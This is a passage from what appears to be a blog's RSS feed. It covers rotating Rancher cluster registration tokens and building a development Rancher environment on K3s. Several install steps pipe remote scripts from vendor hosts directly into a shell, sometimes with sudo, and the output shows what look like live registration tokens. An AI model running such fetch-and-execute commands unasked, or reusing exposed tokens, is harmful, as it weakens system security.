</code></pre><figcaption>Deleting CRTs</figcaption></figure><p>Fleet then adds a new one when we open the registration page in Rancher.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/01/image-3.png" class="kg-image" alt loading="lazy" width="1149" height="751" srcset="https://fe.ax/content/images/size/w600/2022/01/image-3.png 600w, https://fe.ax/content/images/size/w1000/2022/01/image-3.png 1000w, https://fe.ax/content/images/2022/01/image-3.png 1149w" sizes="(min-width: 720px) 720px"><figcaption>Cluster registration page</figcaption></figure><p>The new token is visible in the local cluster.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">marco@cp1:~$ kubectl get clusterregistrationtoken.management.cattle.io -n c-75snr
NAME            AGE
crt-zpbl6       4m5s
default-token   3m5s</code></pre><figcaption>CRTs are recreated by Rancher&apos;s Fleet</figcaption></figure><p>To show the tokens efficiently, we can use custom columns.</p><pre><code class="language-shell">kubectl get clusterregistrationtoken.management.cattle.io -n c-75snr -o custom-columns=NAME:.metadata.name,TOKEN:.status.token
NAME            TOKEN
crt-zpbl6       k8zvqgbwdcg5cpbp9jnckb9g6m8z4555vqk79f7vzgpnd94clws2w4
default-token   jntphjz86wl7w7jh624pfchvhnrzgvhdtn26bwnhwfml8rtk4rsnrh</code></pre><p>While the old CRT is invalidated, the &quot;testcrt&quot; cluster is still connected. When we reboot the cluster, the following happens.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/01/image-4.png" class="kg-image" alt loading="lazy" width="604" height="349" srcset="https://fe.ax/content/images/size/w600/2022/01/image-4.png 600w, https://fe.ax/content/images/2022/01/image-4.png 604w"><figcaption>testcrt cluster is unable to connect due to token mismatch</figcaption></figure><p>In the cattle-agent pod, the following logs appear.</p><figure class="kg-card kg-code-card"><pre><code class="language-text">time=&quot;2022-01-22T17:02:04Z&quot; level=info msg=&quot;Connecting to wss://rancher.fe.ax/v3/connect/register with token starting with qjrdq59d78gmbzlqp5vkvztcnpt&quot;
time=&quot;2022-01-22T17:02:04Z&quot; level=info msg=&quot;Connecting to proxy&quot; url=&quot;wss://rancher.fe.ax/v3/connect/register&quot;
time=&quot;2022-01-22T17:02:04Z&quot; level=error msg=&quot;Failed to connect to proxy. Response status: 400 - 400 Bad Request. Response body: cluster not found&quot; error=&quot;websocket: bad handshake&quot;
time=&quot;2022-01-22T17:02:04Z&quot; level=error msg=&quot;Remotedialer proxy error&quot; error=&quot;websocket: bad handshake&quot;</code></pre><figcaption>Cattle agent log</figcaption></figure><p>We now need to patch the credentials secret. Be sure to encode the token with base64, and check that the encoded string does not end in Cg==, which is the encoding of a trailing newline.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">root@cp2:~# kubectl \
  --cluster=&apos;testcrt-cp2&apos; \
  -n cattle-system patch secret cattle-credentials-f945d4e \
  --type=&apos;json&apos; \
  -p=&apos;[{&quot;op&quot; : &quot;replace&quot; ,&quot;path&quot; : &quot;/data/token&quot; ,&quot;value&quot; : &quot;azh6dnFnYndkY2c1Y3BicDlqbmNrYjlnNm04ejQ
1NTV2cWs3OWY3dnpncG5kOTRjbHdzMnc0&quot;}]&apos;
secret/cattle-credentials-f945d4e patched
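# Aside (illustrative): encode the replacement token without a trailing newline.
# A bare echo appends \n, so its base64 output ends in Cg==:
echo -n abc | base64   # YWJj
echo abc | base64      # YWJjCg== (trailing newline; not what we want in the patch)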
</code></pre><figcaption>Patching the new token</figcaption></figure><p>After the secret is patched, we need to redeploy the cattle agent to reload the token.</p><pre><code class="language-shell">root@cp2:~# kubectl --cluster=&apos;testcrt-cp2&apos; rollout restart deployment -n cattle-system cattle-cluster-agent
deployment.apps/cattle-cluster-agent restarted</code></pre><p>Once cattle agent is restarted, we&apos;ll see it&apos;s available in Rancher dashboard again.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/01/image-5.png" class="kg-image" alt loading="lazy" width="623" height="377" srcset="https://fe.ax/content/images/size/w600/2022/01/image-5.png 600w, https://fe.ax/content/images/2022/01/image-5.png 623w"><figcaption>testcrt is back online</figcaption></figure>]]></content:encoded></item><item><title><![CDATA[Setting up a development version of Rancher]]></title><description><![CDATA[<p>After encountering a minor issue with Rancher&apos;s latest version, I decided to check if I could find more information about this problem by digging in the source code, adding some logging to the areas around the relevant parts. To start investigating this issue, I needed a testing environment</p>]]></description><link>https://fe.ax/rancher-development-environment/</link><guid isPermaLink="false">62aa367b094121017a6b400d</guid><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Sat, 15 Jan 2022 20:48:34 GMT</pubDate><content:encoded><![CDATA[<p>After encountering a minor issue with Rancher&apos;s latest version, I decided to check if I could find more information about this problem by digging in the source code, adding some logging to the areas around the relevant parts. To start investigating this issue, I needed a testing environment that hopefully also shows this issue.</p><p>First, we need a machine to build and run Rancher. You can use a VirtualBox VM or some VPS online installed with Ubuntu 20.04.</p><p>There are a few prerequisites before you&apos;re able to build Rancher. 
For one, we need to install Docker; we can do so using Rancher&apos;s Docker install script or any other way you&apos;d prefer.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">curl https://releases.rancher.com/install-docker/20.10.sh | sh</code></pre><figcaption>Installing Docker</figcaption></figure><p>Once that&apos;s installed, we&apos;ll need to set up a Kubernetes cluster. To make it easy, we&apos;ll use Rancher&apos;s lightweight Kubernetes distribution called K3s. We&apos;re using the Docker engine so the cluster can run the images the build process later loads into Docker. K3s uses containerd by default, which doesn&apos;t share Docker&apos;s image store.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">curl -sfL https://get.k3s.io | sudo sh -s - --docker
sudo systemctl start k3s
sudo k3s kubectl get node</code></pre><figcaption>Install single node K3s</figcaption></figure><p>Once it&apos;s up and running showing a &quot;Ready&quot; node, we should install Kubectl for convenience.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell"># Note that this command downloads the matching client version
curl -LO &quot;https://dl.k8s.io/release/$(k3s kubectl version --short=true | awk -F&apos;[ +]&apos; &apos;{print $(NF-1); exit}&apos;)/bin/linux/amd64/kubectl&quot;
sudo install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl
rm -f kubectl
mkdir -p ~/.kube
sudo cat /etc/rancher/k3s/k3s.yaml &gt; ~/.kube/config
chmod 600 ~/.kube/config
kubectl version
# Following lines are to enable bash completion
source &lt;(kubectl completion bash) # setup autocomplete in bash into the current shell, bash-completion package should be installed first.
echo &quot;source &lt;(kubectl completion bash)&quot; &gt;&gt; ~/.bashrc # add autocomplete permanently to your bash shell.
kubectl get nodes</code></pre><figcaption>Installing kubectl and copying the kubeconfig</figcaption></figure><p>Once that&apos;s up and running, let&apos;s install Helm so we can deploy the Helm chart that the Rancher build generates. We&apos;re living on the edge, so this will be easy.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">curl https://raw.githubusercontent.com/helm/helm/main/scripts/get-helm-3 | bash</code></pre><figcaption>Installing Helm</figcaption></figure><p>We&apos;ll also need to use Docker directly. If you are using a regular user, you&apos;ll have to allow access to Docker by adding the user to the &quot;docker&quot; group.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">sudo usermod -aG docker marco
# Restart session to reload privileges</code></pre><figcaption>Giving user privileges to Docker</figcaption></figure><p>Now we&apos;ve set that up, we need to grab the source code and build it. We start by cloning the Rancher source code from their <a href="https://github.com/rancher/rancher">GitHub</a>.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">sudo apt install git make
# Make sure you are using the version tag you want
git clone https://github.com/rancher/rancher.git -b v2.6.3</code></pre><figcaption>Cloning Rancher</figcaption></figure><p>After we&apos;ve cloned the source code, we can jump into building it. First, we&apos;ll remove the test step from the ci script, which makes the Rancher build a lot quicker. You can also temporarily remove the validate step if you want it to be even quicker.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">cd rancher
nano scripts/ci
</code></pre><figcaption>Editing the ci script</figcaption></figure><p>The new ci script looks like this for me.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">#!/bin/bash
set -e

cd $(dirname $0)

./validate
./build
#./test
./package
./chart/ci</code></pre><figcaption>Contents of the ci file in the scripts directory</figcaption></figure><p>We need to commit the change to the ci script and run &quot;make&quot;. If you do not commit the change to git, the build process will tell you the repository is dirty.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">git config --global user.email &quot;feaxblog@gmail.com&quot;
git config --global user.name &quot;Marco Stuurman&quot;
git commit -am &quot;Disable tests for development&quot;
make
# If it fails because of a timeout, try once more</code></pre><figcaption>Committing the changes</figcaption></figure><p>Running the make command may take a long time, depending on the system resources you&apos;ve given the VM. The first build took me about 30 minutes. Once the build finishes, you&apos;ll see Docker images tagged with the build&apos;s &quot;VERSION&quot; in the local image list.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">marco@rdev:~/rancher$ docker images
REPOSITORY                     TAG              IMAGE ID       CREATED          SIZE
rancher/rancher-runtime        b209dbd85        8c3c1beccbe7   25 minutes ago   269MB
rancher/rancher-agent          b209dbd85        bd7908b20a0f   25 minutes ago   533MB
rancher/rancher                b209dbd85        3c4a1c6ce2d1   26 minutes ago   1.17GB</code></pre><figcaption>The output of docker images</figcaption></figure><p>The build process automatically generates a Helm chart to deploy your development build of Rancher. Let&apos;s deploy Rancher!</p><p>First, we need to install cert-manager to let Rancher deal with the certificates.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">kubectl apply -f https://github.com/jetstack/cert-manager/releases/download/v1.5.1/cert-manager.crds.yaml
helm repo add jetstack https://charts.jetstack.io
helm repo update
helm install cert-manager jetstack/cert-manager \
  --namespace cert-manager \
  --create-namespace \
  --version v1.5.1</code></pre><figcaption>Install cert-manager</figcaption></figure><p>Once that is installed, let&apos;s install Rancher itself.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">kubectl create namespace cattle-system
helm install rancher \
  bin/chart/dev/rancher-0.0.0-1642269672.commit-b209dbd85.HEAD.tgz \
  --namespace cattle-system \
  --set hostname=rancher.your.domain \
  --set replicas=1 \
  --set bootstrapPassword=SomeGeneratedP4ssw0rd
</code></pre><figcaption>Install your development Rancher</figcaption></figure><p>Let&apos;s check if Rancher can start.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">marco@rdev:~/rancher$ kubectl get pods -n cattle-system
NAME                       READY   STATUS    RESTARTS      AGE
rancher-68b5949696-nqts9   0/1     Running   0             16s
rancher-68b5949696-qk9ng   0/1     Running   0             16s
rancher-68b5949696-h5k9z   0/1     Running   1 (13s ago)   16s</code></pre><figcaption>Rancher installation in progress</figcaption></figure><figure class="kg-card kg-code-card"><pre><code class="language-shell">marco@rdev:~/rancher$ kubectl get pods -n cattle-system
NAME                               READY   STATUS      RESTARTS        AGE
rancher-68b5949696-h5k9z           1/1     Running     1 (3m27s ago)   3m30s
rancher-68b5949696-nqts9           1/1     Running     0               3m30s
rancher-68b5949696-qk9ng           1/1     Running     0               3m30s
helm-operation-s768m               0/2     Completed   0               2m53s
helm-operation-tvx2n               0/2     Completed   0               2m21s
rancher-webhook-5d4f5b7f6d-7mfhc   1/1     Running     0               2m9s
helm-operation-fm9z4               0/2     Completed   0               2m13s</code></pre><figcaption>Rancher is ready!</figcaption></figure><p>Let&apos;s open the hostname we gave to Helm in a browser.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/01/image.png" class="kg-image" alt loading="lazy" width="1270" height="842" srcset="https://fe.ax/content/images/size/w600/2022/01/image.png 600w, https://fe.ax/content/images/size/w1000/2022/01/image.png 1000w, https://fe.ax/content/images/2022/01/image.png 1270w" sizes="(min-width: 720px) 720px"><figcaption>Rancher dashboard</figcaption></figure><p>That worked! Now we can log in using the bootstrap password we gave to Helm.</p><p>Once logged in, we can confirm our development version of Rancher is running by checking the hamburger menu on the top left.</p><figure class="kg-card kg-image-card"><img src="https://fe.ax/content/images/2022/01/image-1.png" class="kg-image" alt loading="lazy" width="1270" height="842" srcset="https://fe.ax/content/images/size/w600/2022/01/image-1.png 600w, https://fe.ax/content/images/size/w1000/2022/01/image-1.png 1000w, https://fe.ax/content/images/2022/01/image-1.png 1270w" sizes="(min-width: 720px) 720px"></figure><p>Let&apos;s set up Visual Studio Code (vscode for short).</p><p>First, we need to <a href="https://code.visualstudio.com/download">install vscode</a>, which should be pretty straightforward.</p><p>Next, we should install some extensions. The following will be needed:</p><ul><li><a href="https://marketplace.visualstudio.com/items?itemName=ms-vscode-remote.remote-ssh">Remote - SSH</a></li><li><a href="https://marketplace.visualstudio.com/items?itemName=golang.Go">Go</a></li></ul><p>Next, we can connect to the build machine with the Remote - SSH extension and open the cloned rancher directory.</p><p>From now on, you can change whatever you need in the code, then commit, build, run helm upgrade, and test.</p><p>I hope I find this blog post very interesting when I refresh my memory. To everyone else who reads this, thank you!</p><p>Additional information:</p><p>Don&apos;t forget to <a href="https://rancher.com/docs/rancher/v2.5/en/troubleshooting/logging/#how-to-configure-a-log-level">raise the log level</a></p><pre><code class="language-shell">kubectl -n cattle-system get pods -l app=rancher --no-headers -o custom-columns=name:.metadata.name | while read rancherpod; do kubectl -n cattle-system exec $rancherpod -c rancher -- loglevel --set debug; done</code></pre>]]></content:encoded></item></channel></rss>